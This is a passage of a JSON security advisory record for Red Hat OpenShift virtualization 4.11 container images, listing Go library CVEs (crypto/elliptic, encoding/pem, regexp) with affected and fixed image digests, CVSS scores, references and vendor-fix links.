"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-23806"
},
{
"category": "external",
"summary": "RHBZ#2053429",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2053429"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-23806",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23806"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-23806",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23806"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ",
"url": "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ"
}
],
"release_date": "2022-02-11T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-09-14T19:28:51+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:6526"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: crypto/elliptic: IsOnCurve returns true for invalid field elements"
},
{
"cve": "CVE-2022-24675",
"cwe": {
"id": "CWE-120",
"name": "Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)"
},
"discovery_date": "2022-04-21T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64",
"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2077688"
}
],
"notes": [
{
"category": "description",
"text": "A buffer overflow flaw was found in Golang\u0027s library encoding/pem. This flaw allows an attacker to use a large PEM input (more than 5 MB), causing a stack overflow in Decode, which leads to a loss of availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: encoding/pem: fix stack overflow in Decode",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Enterprise Linux 7, 8 and 9 are affected, because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having Moderate security impact, and the issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7, hence, marked as Out-of-Support-Scope.\n\nRed Hat Developer Tools - Compilers (go-toolset-1.16-golang \u0026 go-toolset-1.17-golang), ships the vulnerable code and affected by this vulnerability.\n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle \u0026 Updates Policy: https://access.redhat.com/support/policy/updates/errata/.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64"
],
"known_not_affected": [
"8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64",
"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-24675"
},
{
"category": "external",
"summary": "RHBZ#2077688",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2077688"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-24675",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-24675"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-24675",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24675"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/oecdBNLOml8",
"url": "https://groups.google.com/g/golang-announce/c/oecdBNLOml8"
}
],
"release_date": "2022-04-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-09-14T19:28:51+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:6526"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: encoding/pem: fix stack overflow in Decode"
},
{
"cve": "CVE-2022-24921",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2022-03-16T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
